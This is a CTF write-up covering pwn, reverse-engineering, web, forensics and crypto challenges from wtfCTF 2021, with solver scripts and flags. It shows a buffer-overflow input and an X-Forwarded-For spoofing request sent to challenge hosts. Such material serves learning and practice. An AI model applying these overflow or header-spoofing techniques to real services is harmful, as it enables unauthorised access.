		USBSTOR\GenDisk
		GenDisk
		
		
Windows Portable Devices
	--
	FriendlyName:	E:\
	Serial Number:	03003017101520132956&0
	Last Write Time:	2021-05-21 07:17:16 UTC+0000

The USB device was last connected at 2021-05-21 08:00:17.

wtfCTF{45_08:17_2021-05-21_08:00:17}

MoM5m4g1c (Pwn)

The buffer that gets() writes into is 125 bytes. Overflowing it so that water is overwritten with anything other than \x00 makes the program print the flag.

$ nc 20.42.99.115 3000
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
wtfCTF{N1c3!n0w_U_c4N_34t_uR_Ch0c0L4t3}
wtfCTF{N1c3!n0w_U_c4N_34t_uR_Ch0c0L4t3}

k3Y (Pwn)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  uint local_10;
  uint local_c;
  
  local_c = rand();
  local_10 = 0;
  printf("Enter the Key: ");
  __isoc99_scanf(&DAT_00102018,&local_10);
  if ((local_10 ^ local_c) == 0xacedface) {
    puts("Yayy! U made it!");
    system("cat flag");
  }
  else {
    puts("Oops!, Best of luck with trying the other 2^32 cases.");
  }
  return 0;
}

When rand() is called without seeding, it behaves as if srand(1) had been called, so the value is fixed. Compile and run the following to get the value to enter.

$ cat get_rand.c 
#include <stdio.h>
#include <stdlib.h>

/* rand() with no srand() is rand() seeded with 1, so the first output is
 * fixed; the key is the value whose XOR with it gives 0xacedface. %d prints
 * the unsigned result as a signed 32-bit integer, which is what gets sent. */
int main(void) {
    unsigned int random = rand();
    printf("%d\n", random ^ 0xacedface);
    return 0;
}
$ gcc get_rand.c -o get_rand
$ ./get_rand
-949567575
$ nc 20.42.99.115 3143
-949567575
wtfCTF{c0n80!_Th15_i5_tH3_fL48}
Enter the Key: Yayy! U made it!
wtfCTF{c0n80!_Th15_i5_tH3_fL48}
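The same key can be derived without a C compiler by reimplementing glibc's generator: rand() with no srand() is rand() seeded with 1, and glibc's default generator is an additive lagged-Fibonacci generator whose 34-word state is derived from the seed with a Park-Miller LCG and run 310 steps before the first output. The script below is an added example, not part of the original writeup; it treats seeds as positive 31-bit values (the only case needed here) and converts the result to the signed form that get_rand.c printed.

```python
MASK32 = 0xFFFFFFFF


def glibc_rand(seed: int = 1):
    """Yield successive glibc rand() outputs for srand(seed)."""
    assert 0 <= seed < 2 ** 31, "negative seeds take a different sign path in glibc"
    r = [seed or 1]                            # glibc replaces seed 0 with 1
    for i in range(1, 31):
        # Park-Miller step (glibc uses Schrage's method; identical for positive state)
        r.append((16807 * r[i - 1]) % 2147483647)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344):                   # 310 outputs discarded during seeding
        r.append((r[i - 31] + r[i - 3]) & MASK32)
    i = 344
    while True:
        r.append((r[i - 31] + r[i - 3]) & MASK32)
        yield r[i] >> 1                        # unsigned shift gives the 31-bit output
        i += 1


def to_int32(v: int) -> int:
    """Reinterpret a 32-bit pattern as C's signed int, as printf("%d") did in get_rand.c."""
    v &= MASK32
    return v - (1 << 32) if v & 0x80000000 else v


def key_for(target: int = 0xACEDFACE, seed: int = 1) -> int:
    """Unsigned value whose XOR with the first rand() output equals target."""
    return next(glibc_rand(seed)) ^ target


if __name__ == "__main__":
    g = glibc_rand()
    print([next(g) for _ in range(3)])     # first rand() outputs for seed 1
    print(to_int32(key_for()))             # value to type into the service
```

The first output for seed 1 is 1804289383, and 1804289383 ^ 0xacedface reinterpreted as a signed int is the -949567575 that get_rand.c printed.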

H3ll0R3v (Reverse)

Viewing the file in a hex editor shows it is in pyc format, so decompile it.

$ mv Hello Hello.pyc
$ uncompyle6 Hello.pyc 
# uncompyle6 version 3.7.4
# Python bytecode 3.8 (3413)
# Decompiled from: Python 3.6.9 (default, Jan 26 2021, 15:33:00) 
# [GCC 8.4.0]
# Embedded file name: Hello.py
# Compiled at: 2021-05-19 14:23:46
# Size of source mod 2**32: 1923 bytes


def main(input):
    j = -4
    for c in input:
        if j == 1:
            if c != 'Z':
                exit(43)
            else:
                if j == -7:
                    if c != 'w':
                        exit(133)
                    else:
                        if j == -5:
                            if c != 'f':
                                exit(42069)
                            else:
                                if j == -4:
                                    if c != 'C':
                                        exit(11037)
                                else:
                                    if j == 7:
                                        if c != 'R':
                                            exit(9001)
                                        else:
                                            if j == -2:
                                                if c != 'F':
                                                    exit(11037)
                                            if j == -1 and c != '{':
                                                exit(11037)
                                    if j == 4 and c != '3':
                                        exit(11037)
                        elif j == 0 and c != '3':
                            exit(11037)
                else:
                    if j == -3:
                        if c != 'T':
                            exit(82)
                        if j == 2:
                            if c != '_':
                                exit(11037)
                        if j == -6:
                            if c != 't':
                                exit(133)
                        if j == 6:
                            if c != 'E':
                                exit(133)
                    elif j == 9 and c != '3':
                        exit(7223)
        else:
            if j == 3:
                if c != 'R':
                    exit(133)
                if j == 5:
                    if c != 'V':
                        exit(133)
                if j == 8:
                    if c != '5':
                        exit(6738)
            elif j == 10:
                if c != '}':
                    exit(1111)
            j += 1
    else:
        print('Hello World')
# okay decompiling Hello.pyc

Taking the code as written does not yield an answer. Treat each top-level test such as "j == 1" as applying only to the if statement that immediately follows it, ignoring the nesting, and line up the characters starting from the j == -7 check.

wtfCTF{3Z_R3VER53}

M4sk3r (Web)

Accessing https://wtfmasker.herokuapp.com/source shows the source code.

$ curl https://wtfmasker.herokuapp.com/source
const express = require('express');
const app = express();
const port =  process.env.PORT;
const path = require('path');
const fs = require('fs');

app.use(express.urlencoded({
  extended: true
}))

var SOURCE = '';
fs.readFile(path.dirname(__filename+'/index.js'), 'utf-8', (err, data)=>{
  if(err){
    console.error(err);
    return
  }
  SOURCE = data;
})
const first = process.env.FIRST
const second = process.env.SECOND

const FLAG = process.env.FLAG
const temp = 'wtfCTF{sc4mm3d_4g41n}'


app.get('/getFlag', (req, res) => {
  if ('x-forwarded-for' in req.headers) {
    // I believe in 0,2,-1
    var InternetProtocols = req.headers['x-forwarded-for'].split(', ')
    if (!InternetProtocols) {
     return res.status(400).send("<h4>Visible confusion</h4>");
    }
    if ((InternetProtocols[first] !== InternetProtocols[second]) || (InternetProtocols[first] !== InternetProtocols[InternetProtocols.length - 1])) {
     return res.status(400).send("<h4>The indices I wanted to check don't match, no flag for you :p</h4>");
    }

    var ip = InternetProtocols[first].toString();
    if (ip != "6.9.6.9") {
      return res.status(401).send("Nah, incorrect ip");
    }
    return res.send("Damn, nice one you get to enjoy this : <h4>" + FLAG + "</h4>");
  }
  res.send(temp)
})

app.get('/', (req, res) => {
  res.sendFile(path.join(__dirname, './' ,'index.html'))
})

app.get('/source', (req, res) => {
  res.send(SOURCE);
})

app.post('/checkFlag', (req,res)=>{
    var inpFlag = req.body.flagInput;

    if(inpFlag === FLAG){
      return res.send("Flag Is Correct! GG");
    }
    res.send("Flag Is wrong");
    
})

app.listen(port)

If the entries of X-Forwarded-For at the indices first and second, and the first and last entries, are identical and that value is "6.9.6.9", the flag is returned. Sending the header twice was enough (Node joins repeated headers with ", ").

$ curl -H "X-Forwarded-For: 6.9.6.9" -H "X-Forwarded-For: 6.9.6.9" https://wtfmasker.herokuapp.com/getFlag
Damn, nice one you get to enjoy this : <h4>wtfCTF{just_4n0th3r_h34d3r}</h4>
wtfCTF{just_4n0th3r_h34d3r}
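The whole /getFlag decision rests on X-Forwarded-For, which the client writes. The script below is an added example, not the challenge's own code: getflag_check mirrors the Node logic (including JavaScript's undefined for an out-of-range index) so header sets can be tried offline, with FIRST and SECOND, the app's hidden environment variables, passed as parameters; client_ip_from_xff shows the usual hardening, which takes the client address only from the slot appended by a proxy you control and ignores the client-supplied entries to its left.

```python
from typing import List, Optional


def join_duplicate_headers(values: List[str]) -> str:
    """Node's http parser exposes repeated X-Forwarded-For headers joined with ', '."""
    return ", ".join(values)


def getflag_check(xff_values: List[str], first: int, second: int, want: str = "6.9.6.9") -> str:
    """Outcome of the challenge's check for a list of X-Forwarded-For header values."""
    ips = join_duplicate_headers(xff_values).split(", ")

    def at(i: int) -> Optional[str]:      # JS indexing: out of range is undefined
        return ips[i] if 0 <= i < len(ips) else None

    if at(first) != at(second) or at(first) != ips[-1]:
        return "indices differ"
    if at(first) != want:
        return "incorrect ip"
    return "flag"


def client_ip_from_xff(xff: str, remote_addr: str, trusted_hops: int) -> str:
    """Hardened selection: trust only the entries appended by our own proxies.

    chain[-1] is the TCP peer; the trusted_hops right-most entries were written
    by proxies we control, so the address just left of them is the client.
    Anything further left came from the client and is ignored. With no trusted
    proxy in front (trusted_hops == 0) the header is ignored entirely.
    """
    chain = [e.strip() for e in xff.split(",") if e.strip()] + [remote_addr]
    idx = len(chain) - 1 - trusted_hops
    return chain[idx] if idx >= 0 else remote_addr


if __name__ == "__main__":
    twice = ["6.9.6.9", "6.9.6.9"]
    print(getflag_check(twice, 0, 1), "/", getflag_check(twice, 0, 2))
    print(client_ip_from_xff("6.9.6.9, 6.9.6.9, 203.0.113.9", "10.0.0.2", trusted_hops=1))
```

With the hint's indices (0 and 2) the two-header request fails on the undefined third slot and three copies are needed; either way, nothing in the check can tell a spoofed entry from a real one, which is the point of the challenge name.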

wtf_B0T (Crypto)

Join the Discord and talk to wtf_Bot_CTF.

Me : help
Bot: Say my name
Me : wtf_Bot_CTF
Bot: Your flag is: etrIKT{R15v0zd_N0z_d4gh3k}

Vigenère cipher. Decrypt it at https://www.dcode.fr/vigenere-cipher, adjusting the key; the key "IAMGROOT" decrypts it.

wtfCTF{D15c0rd_B0t_m4st3r}
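The key does not have to be guessed blind: the flag format gives the known plaintext "wtfCTF{", and subtracting it from the ciphertext letter by letter yields "IAMGRO", from which IAMGROOT is a short step. The script below is an added example, not part of the original writeup. It follows the convention that makes the key line up with this ciphertext (and dcode.fr's default): only letters are shifted, and digits, braces and underscores pass through without consuming a key character.

```python
import string

UPPER = string.ascii_uppercase


def _shift(ch: str, k: int) -> str:
    """Shift one letter by k places, preserving case; non-letters are returned unchanged."""
    if ch.isupper():
        return UPPER[(UPPER.index(ch) + k) % 26]
    if ch.islower():
        return UPPER[(UPPER.index(ch.upper()) + k) % 26].lower()
    return ch


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    out, ki = [], 0
    for ch in text:
        if ch.isalpha():
            k = UPPER.index(key[ki % len(key)].upper())
            out.append(_shift(ch, -k if decrypt else k))
            ki += 1                      # the key advances on letters only
        else:
            out.append(ch)
    return "".join(out)


def key_fragment(cipher: str, known_plain: str) -> str:
    """Key letters implied by a known plaintext prefix: key = cipher - plain (letters only)."""
    frag = []
    for c, p in zip(cipher, known_plain):
        if c.isalpha():
            frag.append(UPPER[(UPPER.index(c.upper()) - UPPER.index(p.upper())) % 26])
    return "".join(frag)


if __name__ == "__main__":
    ct = "etrIKT{R15v0zd_N0z_d4gh3k}"
    print(key_fragment(ct, "wtfCTF{"))        # IAMGRO
    print(vigenere(ct, "IAMGROOT", decrypt=True))
```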

V4l1DaT3 (Crypto)

Use z3 to find values that satisfy the conditions in the code.

from z3 import *

# one 8-bit symbol per unknown byte between 'wtfCTF{' and '}'
x = [BitVec('x%d' % i, 8) for i in range(18)]
s = Solver()

# every byte is printable ASCII; this also keeps z3's signed % and
# comparisons on 8-bit values equal to their unsigned meaning
for v in x:
    s.add(v >= 0x20, v < 0x7f)

# known prefix
s.add(x[0] == ord('k'))
s.add(x[1] == ord('3'))
s.add(x[2] == ord('3'))
s.add(x[3] == ord('p'))

# relations between positions, taken from the checker
s.add(x[4] == x[15])
s.add(x[5] == x[8])
s.add(x[6] == x[12])

s.add(x[7] - x[4] == 42)
s.add(x[7] + 1 == x[9])
s.add(x[9] % x[8] == 46)
s.add(x[11] - x[8] + x[2] == ord('c'))
s.add(x[14] - x[6] == x[17] + 2)
s.add((x[9] % x[5]) * 2 == x[13] + 40)
s.add(x[4] % x[13] == 15)
s.add(x[14] % x[13] == x[12] - 32)
s.add((x[7] % x[6]) + 89 == x[10])
s.add(x[16] % x[15] == 17)

# checksums over bytes 4..17: the XOR fits in 8 bits, but the sum reaches
# 1250, so widen to 16 bits first (an 8-bit sum would silently wrap mod 256)
a = BitVecVal(0, 8)
b = BitVecVal(132, 16)
for i in range(4, 18):
    a = a ^ x[i]
    b = b + ZeroExt(8, x[i])
s.add(a == 72)
s.add(b == 1250)

if s.check() == sat:
    m = s.model()
    flag = ''.join(chr(m[v].as_long()) for v in x)
    print('wtfCTF{%s}' % flag)
else:
    print('unsat')
wtfCTF{k33pC@1m@ndp14yCTF}

Pr4nK (Crypto)

Since p is 2^1024, let Sage solve the discrete log. Then compute z and XOR it with Message.

#!/usr/bin/sage
from Crypto.Util.number import long_to_bytes

with open('msg.txt', 'r') as f:
    p = int(f.readline().rstrip().split(': ')[1])
    b = int(f.readline().rstrip().split(': ')[1])
    x = int(f.readline().rstrip().split(': ')[1])
    y = int(f.readline().rstrip().split(': ')[1])
    Message = int(f.readline().rstrip().split(': ')[1])

# x = b^s mod p: recover the secret exponent s with Sage's discrete log.
# With p = 2^1024 the unit group has order 2^1023, so this is fast.
F = IntegerModRing(p)
s = int(log(F(x), b))
assert pow(b, s, p) == x
print('[+] s =', s)

# shared value z = y^s mod p, XORed onto the message (^^ is XOR in Sage, ^ is power)
z = pow(y, s, p)
fl = Message ^^ z
flag = long_to_bytes(fl).split(b'\x00')[-1]
print('[*] flag:', flag.decode())

The output is as follows.

[+] s = 3500760834200815824254912959978360560462778842148099201384671771825403517354174011533757009996439851598794283042533708449934245863525469711985409342348442867824703870828474794222597219644096639185101676609846821311426681114851095712195523998956581895736228820227678148680332925468816919947782412925162146012
[*] flag: wtfCTF{1nc0gn1t0_c4nt_st0p_v1ru5_dumb0!}
wtfCTF{1nc0gn1t0_c4nt_st0p_v1ru5_dumb0!}

Elgamal (Crypto)

ElGamal, but c1 is not given.

priv_key = da
b = pow(a, da, P)
c1 = pow(a, r, P)
2 < r < (len(c2) + 2)

c2 = (m * pow(b, r, P)) % P

Since the flag starts with "w", brute-force r together with the divisors of a * da to find a and da. Then brute-force m and r per position to recover the flag.

from sympy import divisors

P = 2147483647
a_da = 335007430212    # the product a * da given by the challenge
c2 = [782609095, 956334224, 948802740, 27994553, 1649557991, 1242339631, 2047940013, 1044206616, 758980367, 542738157, 1732201892, 196836220, 193577195, 649932019, 1925903078, 862766676]

# Step 1: a must divide a * da. A candidate is right when some r in the
# allowed range encrypts 'w' (the first flag byte) to c2[0].
a = da = None
for d in divisors(a_da):
    b = pow(d, a_da // d, P)
    if any((ord('w') * pow(b, r, P)) % P == c2[0] for r in range(2, len(c2) + 2)):
        a, da = d, a_da // d
        break
assert a is not None, 'no divisor of a*da encrypts "w" to c2[0]'

print('[+] a =', a)
print('[+] da =', da)

b = pow(a, da, P)
print('[+] b =', b)

# Step 2: each block is m * b^r mod P with a fresh small r, so brute-force
# the printable byte m and r together for every position.
flag = ''
for c in c2:
    for code in range(32, 127):
        if any((code * pow(b, r, P)) % P == c for r in range(2, len(c2) + 2)):
            flag += chr(code)
            break
    print('[+] flag =', flag)

print('[*] flag =', flag)

The output is as follows.

[+] a = 2147483527
[+] da = 156
[+] b = 1989314125
[+] flag = w
[+] flag = wt
[+] flag = wtf
[+] flag = wtfC
[+] flag = wtfCT
[+] flag = wtfCTF
[+] flag = wtfCTF{
[+] flag = wtfCTF{3
[+] flag = wtfCTF{3l
[+] flag = wtfCTF{3l_
[+] flag = wtfCTF{3l_g
[+] flag = wtfCTF{3l_g4
[+] flag = wtfCTF{3l_g4m
[+] flag = wtfCTF{3l_g4m4
[+] flag = wtfCTF{3l_g4m4l
[+] flag = wtfCTF{3l_g4m4l}
[*] flag = wtfCTF{3l_g4m4l}
wtfCTF{3l_g4m4l}

F33db4cK (Crypto)

After answering the survey, this was displayed:

Here's your flag :  05v<X7n#=O%/2m(S_RXxL(zvE2}1TmVjf5V<K}A

base91-decode it at https://www.dcode.fr/base-91-encoding.

wtfCTF{Th4nK5_F0r_th3_fe3db4cK}
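basE91 (Joachim Henke's scheme, the one dcode.fr implements) packs 13 or 14 bits into each pair of alphabet characters depending on the pair's value, so a decoder keeps a bit accumulator and emits a byte whenever 8 bits are ready; characters outside the alphabet are skipped, which is why a flag pasted with stray whitespace still decodes. The decoder and encoder below are an added example, not part of the original writeup, and are run on the string the survey returned above.

```python
ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
            "!#$%&()*+,./:;<=>?@[]^_`{|}~\"")
DECODE = {c: i for i, c in enumerate(ALPHABET)}


def b91decode(text: str) -> bytes:
    out = bytearray()
    bits = 0          # bit accumulator
    nbits = 0         # number of valid bits in the accumulator
    first = -1        # first symbol of the current pair, -1 if none pending
    for ch in text:
        idx = DECODE.get(ch)
        if idx is None:
            continue                        # not in the alphabet: skip
        if first < 0:
            first = idx
            continue
        value = first + idx * 91
        bits |= value << nbits
        # a pair whose low 13 bits exceed 88 carries 13 bits, otherwise 14
        nbits += 13 if (value & 8191) > 88 else 14
        while nbits > 7:
            out.append(bits & 0xFF)
            bits >>= 8
            nbits -= 8
        first = -1
    if first >= 0:                          # odd trailing symbol: flush its bits
        out.append((bits | first << nbits) & 0xFF)
    return bytes(out)


def b91encode(data: bytes) -> str:
    out = []
    bits = nbits = 0
    for byte in data:
        bits |= byte << nbits
        nbits += 8
        if nbits > 13:
            value = bits & 8191
            if value > 88:
                bits >>= 13
                nbits -= 13
            else:
                value = bits & 16383
                bits >>= 14
                nbits -= 14
            out.append(ALPHABET[value % 91] + ALPHABET[value // 91])
    if nbits:
        out.append(ALPHABET[bits % 91])
        if nbits > 7 or bits > 90:
            out.append(ALPHABET[bits // 91])
    return "".join(out)


if __name__ == "__main__":
    print(b91decode("05v<X7n#=O%/2m(S_RXxL(zvE2}1TmVjf5V<K}A").decode())
```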